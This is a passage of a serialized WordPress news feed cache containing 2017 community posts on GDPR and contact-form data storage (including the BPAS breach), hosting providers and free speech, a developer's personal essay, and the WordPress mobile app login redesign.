useful reference for site administrators who are not sure how their chosen solution handles data collection and storage. She suggested a few questions for users to ask when examining contact forms:</p>\n<ul>\n<li>Can the option to store data be turned on and off?</li>\n<li>At what granularity?</li>\n<li>Can the data be deleted when the plugin is deleted?</li>\n<li>What personally identifiable data, other than the data from each form, is stored? (i.e. <a href="https://arstechnica.co.uk/tech-policy/2016/10/eu-dynamic-static-ip-personal-data/" target="_blank">a user’s IP address</a>)</li>\n<li>Is it possible to delete the submissions on an ad-hoc or scheduled basis?</li>\n</ul>\n<p>If you&#8217;re not sure what could be leftover in your database from other plugins, Jay has also created a &#8220;<a href="https://github.com/tharsheblows/mjj-whats-in-my-database" target="_blank">What&#8217;s in my database?</a>&#8221; plugin that administrators can install and access under the Tools menu. It is read-only and lists every table and its columns, so users can see if there are any surprises.</p>\n<h3>British Pregnancy Advice Service (BPAS) Hack Highlights the Danger of Storing Contact Form Entries in the Database</h3>\n<p>In educating website owners about the dangers of storing sensitive personal data, Heather Burns often cites the 2012 British Pregnancy Advice Service (BPAS) hack as one of the worst examples of the consequences of storing contact form entries in databases. The hacker, who was later jailed, stole thousands of records from the charity, which was running on an unknown outdated CMS with weak passwords. The site had not undergone a privacy impact assessment on its personal data collection and storage methods.</p>\n<p>&#8220;One of the services BPAS offers is access to abortions,&#8221; Burns said. &#8220;Many of their service users come over from Ireland, where abortion is banned under nearly all circumstances. The site had a contact form where women could enquire about abortions. BPAS thought that messages were merely passing through the site; no one within the organization had any clue that a copy of each contact form submission was stored on the database. Somewhat inevitably, the site was easily hacked by an anti-abortion activist who downloaded the database. He found himself in possession over 5,000 contact form submissions going back over five years containing women’s names, email addresses, phone numbers, and the fact that they were enquiring about abortions. He then announced his intention to publish the womens’ data on an anti-abortion forum.&#8221;</p>\n<p>The hacker was caught and arrested before he had the opportunity to publish the list. He received 32 months of jail time and BPAS was fined £200k for the data protection breaches.</p>\n<p>&#8220;As well as criticizing the charity for their technical failures, the regulator called attention to the fact that no one on the staff had thought to ask the proper questions about the tools they were using; they were also angry that the site had a legalistic privacy policy which was clearly not worth the pixels it was printed on,&#8221; Burns said. &#8220;All of these failures were deemed inadmissible and inexcusable by the data protection regulator. It is no exaggeration to say that women could have been killed because of a contact form.&#8221;</p>\n<p>Auditing contact forms is just one piece of the puzzle for those working towards GDPR compliance. Burns recommends that site administrators conduct a privacy impact assessment of personal and sensitive data that is submitted through forms. Privacy notices should also be clear about how this data is handled and how long it is retained before it is deleted.</p>\n<p>The GDPR was written to be extraterritorial and states that the regulations apply to any site or service that has European users. These sites are expected to protect EU users&#8217; data according to European regulations. Many American company owners are not yet convinced that this is enforceable outside of EU borders and have not invested in getting their online entities to be compliant.</p>\n<p>&#8220;GDPR provides a very useful framework for user protection, which is now more important than ever,&#8221; Burns said. &#8220;I&#8217;m encouraging Americans to work to GDPR because it&#8217;s a constructive accountable framework that&#8217;s a hell of a lot better than nothing.&#8221;</p>\n<p><a href="https://wordpress.org/plugins/wider-gravity-forms-stop-entries/" target="_blank">Wider Gravity Forms Stop Entries</a> is currently the only plugin in the official WordPress directory that addresses GDPR concerns for a specific contact form plugin. Others may become available as the May 2018 deadline approaches. Jonny Allbut warns users in the FAQ to test the plugin with third-party GF extensions before adding it to a live site, as some extensions may rely on referencing data entries stored in form submissions.</p>\n<p>I asked Carl Hancock if Gravity Forms might make storing form entries in the database an optional feature and he confirmed they are considering it.</p>\n<p>&#8220;Yes, this is certainly possible,&#8221; Hancock said. &#8220;We try to avoid conflicts with available 3rd party add-ons for Gravity Forms to encourage their development,&#8221; Hancock said. &#8220;But unfortunately it is not always avoidable. It is a feature that has been requested numerous times in the past and I suspect with the GDPR it will be a feature that will be requested even more going forward.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 23:03:45 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:11;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:46:"Post Status: Free speech, privacy, and the web";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"https://poststatus.com/?p=38615";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://poststatus.com/free-speech-privacy-and-web/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:7492:"<p>Politics and the web are intersecting more and more. In recent news, at least three WordPress related companies have been getting broad media attention.</p>\n<p>In just a few days, we&#8217;ve seen GoDaddy <a href="https://www.vox.com/policy-and-politics/2017/8/14/16143820/godaddy-and-google-wont-host-daily-stormer-domain">shut down a site</a> for violating terms and conditions, <a href="https://www.fastcompany.com/40454089/wordpress-bans-website-of-fascist-group-linked-to-alleged-charlottesville-killer">as well as</a> Automattic. DreamHost received significant attention for <a href="https://www.dreamhost.com/blog/we-fight-for-the-users/">refusing to release site visitor information</a> to the US Department of Justice.</p>\n<p>I think the most relevant angle for this website is to note that it&#8217;s important for web-based services to be prepared for the unexpected news cycles that revolve around web-based properties.</p>\n<p>How well does your PR team know your terms and conditions? What&#8217;s your stance on free speech, and when can that cross a line into speech or content that your service is ready to limit? The definitions can be narrow; let&#8217;s look at Automattic&#8217;s decision to shut down a site called Blood and Soil.</p>\n<p>It&#8217;s a despicable site, and it has been for a while. Automattic is aware of the sites that exist on WordPress.com, and this isn&#8217;t their first rodeo with objectionable sites receiving lots of backlash from advocacy groups. For instance, the Guccifer 2.0 person or group that hacked the Democratic National Committee was on WordPress.com, and they still are. There are countless others, some hacking related, some simply vile or hate-filled.</p>\n<p>So what makes a site cross the line for a particular service? GoDaddy&#8217;s Ben Butler <a href="https://www.fastcompany.com/40411086/activists-push-back-against-the-platforms-that-quietly-empower-hate-groups">described to Fast Company</a> that they draw the line between speech and violence:</p>\n<blockquote><p>GoDaddy&#8217;s Ben Butler described to Fast Company that they draw the line between speech and violence:</p>\n<p>“We strongly support the First Amendment and are very much against censorship on the internet,” writes Ben Butler, director of the Digital Crimes Unit for <a href="https://www.godaddy.com/">GoDaddy</a>, in an email. He adds that, “if a site promotes, encourages, or engages in violence against people, we will take action.”</p></blockquote>\n<p>The GoDaddy decision (which Google followed up with as well) was especially interesting because they made the decision as the domain registrar, not a content host. In that case they weren&#8217;t actually providing the hosting service.</p>\n<p>Automattic has similar policies. Specifically, they link to <a href="https://en.support.wordpress.com/user-guidelines/">user guidelines</a> within their <a href="https://en.wordpress.com/tos/">ToS</a>, which has a clause for &#8220;directly threatening material.&#8221;</p>\n<blockquote><p>Do not post direct and realistic threats of violence. That is, you cannot post a genuine call for violence—or death—against an individual person, or groups of persons. This doesn’t mean that we’ll remove all hyperbole or offensive language.</p></blockquote>\n<p>They also have a specific policy (not directly linked from their ToS) for <a href="https://en.support.wordpress.com/terrorist-activity/">terrorist activity</a>, and a provision to allow them to remove content or users for any reason.</p>\n<p>The terrorist in Charlottesville aligned himself with Blood And Soil, prompting Automattic to pull the plug —  as the line was crossed.</p>\n<p>DreamHost&#8217;s <a href="https://www.dreamhost.com/blog/we-fight-for-the-users/">pushback to the government</a> was about First Amendment concerns as well, primarily with visitors:</p>\n<blockquote><p>The request from the DOJ demands that DreamHost hand over 1.3 <em>million</em> visitor IP addresses — in addition to contact information, email content, and photos of <strong>thousands</strong> of people — in an effort to determine who simply <em>visited</em> the website. (Our customer has also been notified of the pending warrant on the account.)</p>\n<p>That information could be used to identify any individuals who used this site to exercise and express political speech protected under the Constitution’s First Amendment. That should be enough to set alarm bells off in anyone’s mind.</p></blockquote>\n<p>Every host deals with requests that may not require visitor information but definitely do require account information. Automattic&#8217;s Paul Sieminski provided a helpful post on the <a href="https://transparency.automattic.com/2017/07/25/shining-light-on-national-security-letters/">types of requests they get</a>, and how they handle them.</p>\n<p>The US has broad protections built into the First Amendment covering free speech. Platforms are not required to meet those protections; however, many are strident supporters of the First Amendment. Those protections are often for some of the most unpopular types of content. The Supreme Court has ruled there&#8217;s <a href="https://www.bostonglobe.com/opinion/2017/08/14/there-hate-speech-exception-first-amendment/q9m4IqfQvbo24nnlnPor1O/story.html">no hate speech exception in the First Amendment</a>, and this ruling has been cited recently in a trademark case.</p>\n<p>I think the author of the above-cited op-ed makes a good point:</p>\n<blockquote><p>We can and should speak up against hate. As the Supreme Court makes clear, there’s no hate speech exception to the First Amendment. With that freedom comes a heavy burden for government officials like Baker and Walsh, who must try to keep protected speech from turning into acts of violence.</p></blockquote>\n<p>The burden is also heavy for platforms who are dedicated to providing a place for unpopular opinions. There are many times when the unpopular opinion, or anti-government opinion, is incredibly important to protect. But when speech stems over into violence, then I believe platforms have not only a right, but also a responsibility to take a stand.</p>\n<p>It&#8217;s important for organizations to be educated about and consistent with their own terms of service, company-wide. I&#8217;m afraid these hard questions about speech, rights, and responsibility will be pretty common for a while to come. And as fast as information spreads — for instance, the calls for GoDaddy to shut down a hate site this week came in a fury, part of a quickly viral Twitter post — acting quickly and consistently will be incredibly important.</p>\n<p>I&#8217;ve talked about platforms and services with some control over their user base. The obvious other side of this is that there is a whole segment of our community with no control over their users. Your theme, plugin, and WordPress itself can be used without permission by absolutely anyone, and of course that&#8217;s by design. WordPress or a WordPress-related product could be identified and criticized virally for enabling objectionable users and content</p>\n<p>As a community, are we prepared to respond to that?</p>\n<p>PS: If you&#8217;re a journalist writing about WordPress.com and issues like these, please understand the difference between WordPress.com, owned by Automattic, and WordPress the software. <a href="https://poststatus.com/resources/wordpress-versus-automattic/">I wrote a handy guide for you</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 18:38:54 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Brian Krogsgard";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:12;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:41:"HeroPress: The Greatest Screenplay Writer";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2033";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:126:"https://heropress.com/essays/greatest-screenplay-writer/#utm_source=rss&utm_medium=rss&utm_campaign=greatest-screenplay-writer";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:14463:"<img width="960" height="480" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/081617-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: WordPress is not like any other open source communityI saw before." /><p>My upbringing was not quite usual Serbian upbringing. I was almost forbidden to do things I didn&#8217;t really love. My parents insisted on trying things and finding that deep passion. But I didn&#8217;t have to search and try. I always knew what I&#8217;d be when I grow up. As long as I remember, there was no doubt.</p>\n<h3>A classical musician</h3>\n<p>When I was 8 my mom took me to local music school for entrance examination. I was in! Oh, joy! Finally I was learning to play and sing, to read and write this new language. Italian. Oh, music scores too! There was a whole new world that my parents, or anyone in my family, didn&#8217;t know anything about and I was stepping into it. I was doing just fine in it.. and I couldn&#8217;t live outside of it.</p>\n<p>As time passed, I finished elementary and high music school, went to music Academy, almost finished it and then my mother died. It was 2003. Two weeks later I found out I was pregnant. There was no time for grief and I couldn&#8217;t feel the joy. I just switched off and turned to the facts: I became a mom and a wife and I needed a job.</p>\n<p>And what a job did I found. An opera prompter. Opera Prompter! God, I love that job. Every second of it for ten years. I was yelling at singers, singing, conducting, traveling, laughing and crying. My Italian was significantly improved. Working time was great &#8211; so much free time to be a mom, study for Academy, get a hobby&#8230;</p>\n<h3>Opera prompter&#8217;s hobby</h3>\n<p>In 2007 I was administrator in one English speaking forum with focus on software and hardware topics. It helped me to significantly improve my English. And my tech knowledge. Which was close to none when I registered. As one of administrators, occasionally I had to tweak site here and there. It was great! There was this code and when I would change something in code it would show on the site. Neat! I loved reading those files, finding patterns and parts written in humanly understandable forms. Later I learned those were called loops and conditionals. Also later I learned that this language is called PHP and that many other languages for building websites exist. Forum script was phpBB3.</p>\n<p>I was never a gamer. Never understood the point of game, besides finishing it. I guess PHP was to me what games are to passionate gamers. Like a puzzle or sudoku.</p>\n<p>At the same time my marriage was turning from bad into worse and in the beginning of 2008 I finally decided it was enough. We were working on Mozart&#8217;s “Don Giovanni” in Theater. I remember this so clearly because my divorce was just turning from bad into worse. Those few months lasted for centuries after which I still needed a lot of time to recover what&#8217;s left of my self-esteem. My complete mental and emotional health was destroyed after years of domestic violence.</p>\n<p>2009 was important year for me. The cognition of possibility to have local server on my own machine and test everything before executing it on live site turned out to be very helpful.</p>\n<p>In October I needed a blog script and friend recommended WordPress. It was 2.9 version. It didn&#8217;t really work well but everyone was writing about it. There were at least 5 new tutorials on various blogs every day. I was digesting them every morning with my first coffee. The ones I really liked I even reproduced in my shiny new localhost. Soon enough I developed a local monster with different widgets on each page, future posts archive, post series done with custom fields and God knows whatnot. This WordPress was slowly taking over my free time. Every second of it.</p>\n<h3>So, the WordPress it is</h3>\n<p>One day a friend of mine asked me to build him a website for his ensemble. And for money. Money? I never thought of getting money for this. This was too good of a hobby. But he&#8217;s a friend so I did it. Then another friend showed up with the same request. And another.. I became freelance WordPress developer before I could even understand what was happening. It wasn&#8217;t really a favor to friends any more. I was a single mom with mortgage. My daughter was in primary school, life costs became serious while the art-and-culture salary was silently and regularly reduced.</p>\n<blockquote><p>I was freelancing every single minute I could. Sleeping was luxury I could afford on weekends.</p></blockquote>\n<p>My dad was helping me tremendously. He was babysitting during theater&#8217;s rehearsals and performances in the evenings. When I&#8217;d get home, my daughter was sleeping, tomorrow&#8217;s meals cooked, dishes done and shining. I could go on like this but it was uncertain for how long.</p>\n<p>In the summer of 2013 I was recovering from what was supposed to be routine gallbladder surgery and what nearly cost me life. Almost fully operational, I was getting ready for next roller coaster known as a mix of school year, freelancing and theater&#8217;s season. Then my father died. Suddenly. In an accident.</p>\n<p>Oh, this screaming silence..</p>\n<p>I couldn&#8217;t think. Or breathe. For months. I needed someone to put the roller coaster on pause. Just.. Just a short one. To take a breathe. But there was no one. I was all alone with a 9 years old child who had to grow up fast. I had to grow up fast.</p>\n<blockquote><p>All of a sudden I realized that I can not afford a single mistake any more. I can not be ill, get in debts, lose job. Or mind. I was the only one I could count on.</p></blockquote>\n<p>In 2014 my theater salary got reduced once again. And again in following year. 30% in total. For ten years it never covered all of my monthly expenses but this was ridiculous. It was a time for me to stop playing it safe and see what I&#8217;m made of. That was probably the most difficult decision I have ever made. A heart breaking one. Stop being musician. So I quit being Opera Prompter and started working as a full time WordPress developer.</p>\n<h3>Well, hello, World!</h3>\n<p>I didn&#8217;t really know for which wage level my knowledge was. For years I was the only WordPress developer I knew in person. The rest were all online superstars I was learning from. So I started as a shy medior and the only WordPress developer in agency. It turns out that, for this agency needs, I was senior and soon enough I was organizing and leading development processes for new projects.</p>\n<p>From the business point of view repeating similar projects makes you &#8220;niche expert&#8221;. I do understand that. But, as many other developers out there, I don&#8217;t like repeating the same tasks or projects. Not even once. I missed variety which led me to become more active contributor on wordpress.org.</p>\n<blockquote><p>For years I was just contributing to codex here and there and never really thought about all the people behind WordPress.</p></blockquote>\n<p>In my vague image, they were a bunch of really great developers and they were doing just fine. I was learning from them so I could not possibly help them. I would just be on their way.</p>\n<p>However, in my attempt to find something interesting to keep my mind amused with, I came upon <a href="https://make.wordpress.org/chat/">Slack url</a> for communication between contributors on WordPress project. What a crowd! And not just developers &#8211; everyone! Doing all kinds of different bits, and all important. How odd. WordPress is not like any other open source community I saw before. So much more open and inviting! I remember reading through channels and thinking: &#8220;I could do this&#8221;, &#8220;Oh, I&#8217;d love to learn that&#8221;, &#8220;This person is funny&#8221;.. I&#8217;m gonna stick.</p>\n<h3>Antisocial extrovert in a more open open source community</h3>\n<p>No matter how I tried, and I did try, I&#8217;m just not a people person. Among other antisocial treats, over the years I have developed a heavy dark humor which, more often than not, due to lack of social interactions I reveal in a completely wrong way. But these people seem not to mind so I thought to give it a try with them. Don&#8217;t get me wrong, <a href="https://make.wordpress.org/community/handbook/wordcamp-organizer/planning-details/code-of-conduct/">Code of Conduct</a> is extremely important in WordPress community. No community wants bullies. But rare communities accept social weirdos and misfits. And this one doesn&#8217;t just accept them, it makes them feel like fits. That was a nice change.</p>\n<p>I started attending local <a href="https://www.meetup.com/WP-Meetup-NS/">Meetups</a>, even gave <a href="https://www.meetup.com/WP-Meetup-NS/events/235186967/">a talk</a> on contributing to <a href="https://make.wordpress.org/themes/handbook/get-involved/become-a-reviewer/">Theme Review team</a> after which I was invited to join <a href="https://www.toptal.com/">Toptal platform</a> as a freelance developer. My social adventure got me volunteering on <a href="https://2017.belgrade.wordcamp.org/">WordCamp Belgrade</a> and <a href="https://2017.europe.wordcamp.org/">WordCamp Europe in Paris</a>. I must admit there were &#8220;too many people at the same time&#8221; moments but there were lots of ways to stay involved with controlled dose of human interactions. I chose volunteering at Experts bar and it worked out just great. I really loved all the hugs though.</p>\n<p>Today I try to keep my focus on just a few channels in make WordPress slack and my contribution wish list regularly updated. One can have only so many hours in a day. Most often you&#8217;ll find me in <a href="https://wordpress.slack.com/?redir=%2Fmessages%2Fdocs">#docs</a> and <a href="https://wordpress.slack.com/?redir=%2Fmessages%2Fcore-docs">#core-docs</a> channels, doing various stuff with <a href="https://make.wordpress.org/docs/handbook/about-the-docs-team/get-involved/">Documentation</a> team.</p>\n<p><a href="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/milana-cap_wcbgd.jpg"><img class="alignnone wp-image-2036 size-large" src="http://20094-presscdn.pagely.netdna-cdn.com/wp-content/uploads/2017/08/milana-cap_wcbgd-1024x683.jpg" alt="Milana, on a rooftop baclony with some other people looking at her phone" width="960" height="640" /></a></p>\n<h3>The Questions</h3>\n<p>Among all the questions I get about my professional path, the most commons are &#8220;<strong>How come you made such a huge change from music to web development?</strong>&#8220;, &#8220;<strong>Did you go to school to become a developer</strong>?&#8221; and &#8220;<strong>Do you miss being musician?</strong>&#8220;. Answer to the first question is quite easy:</p>\n<p>&#8220;Being musician and writing code are pretty much the same. They both require the same parts of your mental struggle and make you go through the same emotional tortures and enlightenments.&#8221;</p>\n<p>The second question, however, is a bit more difficult to answer. In the light of the first answer, I could say that I was exposed to the required way of thinking. Practicing an instrument 6 hours per day for over a decade does teach you a couple of things about commitment. World of classical music is a world of magnificent talents and varieties which touches you all the way to the humble self where you find appreciation for being able to feel this way. Personally, I believe this is extremely important for developer &#8211; to be humble and grateful to person who helped them find this humbleness.</p>\n<p>No, I don&#8217;t have a formal developer&#8217;s education. It doesn&#8217;t seem to prevent me from being developer. And no, I don&#8217;t miss being musician. Because I never stopped being one. I listen to classical music while I code and play piano when I have a difficult programming problem to solve. Feels so natural.</p>\n<p>I&#8217;d like to say that everything turned out pretty good at the end but, as my father used to say: &#8220;Life is the greatest screenplay writer&#8221; and my life seems to be the witty one too. In expectation of future turns I&#8217;d recommend <a href="https://www.youtube.com/watch?v=-4788Tmz9Zo&t=884s">Beethoven&#8217;s Symphony No.7, II movement</a>, some very loud laughs and lots of WordPress loops.</p>\n<div class="rtsocial-container rtsocial-container-align-right rtsocial-horizontal"><div class="rtsocial-twitter-horizontal"><div class="rtsocial-twitter-horizontal-button"><a title="Tweet: The Greatest Screenplay Writer" class="rtsocial-twitter-button" href="https://twitter.com/share?text=The%20Greatest%20Screenplay%20Writer&via=heropress&url=https%3A%2F%2Fheropress.com%2Fessays%2Fgreatest-screenplay-writer%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-fb-horizontal fb-light"><div class="rtsocial-fb-horizontal-button"><a title="Like: The Greatest Screenplay Writer" class="rtsocial-fb-button rtsocial-fb-like-light" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fheropress.com%2Fessays%2Fgreatest-screenplay-writer%2F" rel="nofollow" target="_blank"></a></div></div><div class="rtsocial-linkedin-horizontal"><div class="rtsocial-linkedin-horizontal-button"><a class="rtsocial-linkedin-button" href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fessays%2Fgreatest-screenplay-writer%2F&title=The+Greatest+Screenplay+Writer" rel="nofollow" target="_blank" title="Share: The Greatest Screenplay Writer"></a></div></div><div class="rtsocial-pinterest-horizontal"><div class="rtsocial-pinterest-horizontal-button"><a class="rtsocial-pinterest-button" href="https://pinterest.com/pin/create/button/?url=https://heropress.com/essays/greatest-screenplay-writer/&media=https://heropress.com/wp-content/uploads/2017/08/081617-150x150.jpg&description=The Greatest Screenplay Writer" rel="nofollow" target="_blank" title="Pin: The Greatest Screenplay Writer"></a></div></div><a rel="nofollow" class="perma-link" href="https://heropress.com/essays/greatest-screenplay-writer/" title="The Greatest Screenplay Writer"></a></div><p>The post <a rel="nofollow" href="https://heropress.com/essays/greatest-screenplay-writer/">The Greatest Screenplay Writer</a> appeared first on <a rel="nofollow" href="https://heropress.com">HeroPress</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 12:00:44 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Milana Cap";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:13;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:67:"WPTavern: WordPress Mobile Apps Updated with a New Login Experience";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74197";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:78:"https://wptavern.com/wordpress-mobile-apps-updated-with-a-new-login-experience";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4732:"<p>The WordPress mobile apps are sporting <a href="https://en.blog.wordpress.com/2017/08/15/an-updated-login-coming-to-the-wordpress-mobile-apps/" target="_blank">a new login experience</a> that Automattic&#8217;s mobile designers and developers released in the latest versions. The login flow has been completely redesigned to provide a more unified experience for connecting both self-hosted and WordPress.com-hosted sites. These flows were completely separate in the past and users were often confused about which one to select. The new design provides fewer opportunities for friction when logging in, an experience that likely determines many users&#8217; first impressions of the app.</p>\n<a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/self-hosted-login-wp-mobile-apps.png?ssl=1"><img /></a>Self-hosted login on mobile apps\n<p>&#8220;As we reimagined the login experience, there were a few key principles guiding us: keep it simple, minimize the distinction between a site hosted at WordPress.com versus somewhere else, and avoid anything that might be too clever,&#8221; Automattic mobile lead Eric Johnson said.</p>\n<p>Users can now connect new sites by entering the URL and the mobile apps will automatically detect if the site is hosted on WordPress.com or not. The new login flow ferries users on to the next step based on what kind of site is being connected. This is available in version 8.0 of WordPress for Android and version 8.2 of WordPress for iOS.</p>\n<p>The new login experience emphasizes the ease of using magic links for logging into WordPress.com. If the user enters and email address, the app will generate an authentication link and send it via email. This allows users to login without having to remember or enter a password.</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/new-login-experience-wp-mobile-apps.png?ssl=1"><img /></a></p>\n<p>If a user is entering the world of WordPress for the first time through the mobile apps, the new login experience also offers a short tour of the some of the features included in the app. These include WordPress.com features such as notifications, Stats, and the Reader. The apps, despite being marketed as the official WordPress mobile apps, are a product of Automattic and include a commercial upgrade path for WordPress.com services.</p>\n<p>The idea of the apps functioning as a gateway to help the greater WordPress ecosystem gain more users (and eventually see some graduate to self-hosted sites), no longer seems credible now that WordPress.com has <a href="https://wptavern.com/wordpress-coms-business-plan-gives-subscribers-a-way-to-tap-into-wordpress-orgs-third-party-ecosystem" target="_blank">entered the hosting space by allowing its customers to tap into third-party plugins and themes</a>.</p>\n<p>The updated login experience, while more convenient for users, continues to blur the line between self-hosted and WordPress.com-hosted sites. WordPress for Android and iOS used to have their own separate blogs but all of the news is now funneled through WordPress.com&#8217;s news blog and the @WordPressiOS and @WPAndroid Twitter accounts seemed to have been abandoned in favor of marketing updates through WordPress.com.</p>\n<p>In the past, many in the WordPress community have asked why the apps are not called the WordPress.com mobile apps, since they include features that are not central to the core publishing experience for self-hosted users. Last year when I <a href="https://wptavern.com/wordpress-for-android-5-7-adds-path-to-upgrade-wordpress-com-plan" target="_blank">interviewed</a> Maxime Biais, one of Automattic’s mobile engineers, he said the team had considered splitting the product into two apps.</p>\n<p>“We considered having both WordPress and WordPress.com apps, but we rejected this because it doesn’t make it more clear,” Bias said. “It’s probably even more ambiguous when someone searches the Play Store for &#8216;WordPress&#8217; or &#8216;Blog&#8217; and finds both WordPress and WordPress.com apps.”</p>\n<p>Now that that mobile apps have become a direct pipeline for new WordPress.com hosting customers, it may be time to re-visit the consideration of splitting the apps into two distinct products: one for WordPress.com&#8217;s commercial interests and one that officially represents the open source WordPress project for self-hosted users without any corporate interests. If the project&#8217;s official mobile apps are a key part of new users&#8217; onboarding experience, they should accurately represent the software as an independent platform that can be hosted with and extended by any number of free and commercial products in the WordPress ecosystem.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 06:33:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:14;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"WPTavern: WordCamp US to Experiment With A Community Bazaar";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74138";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:70:"https://wptavern.com/wordcamp-us-to-experiment-with-a-community-bazaar";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2237:"<p>In addition to taking place in a new location this year, <a 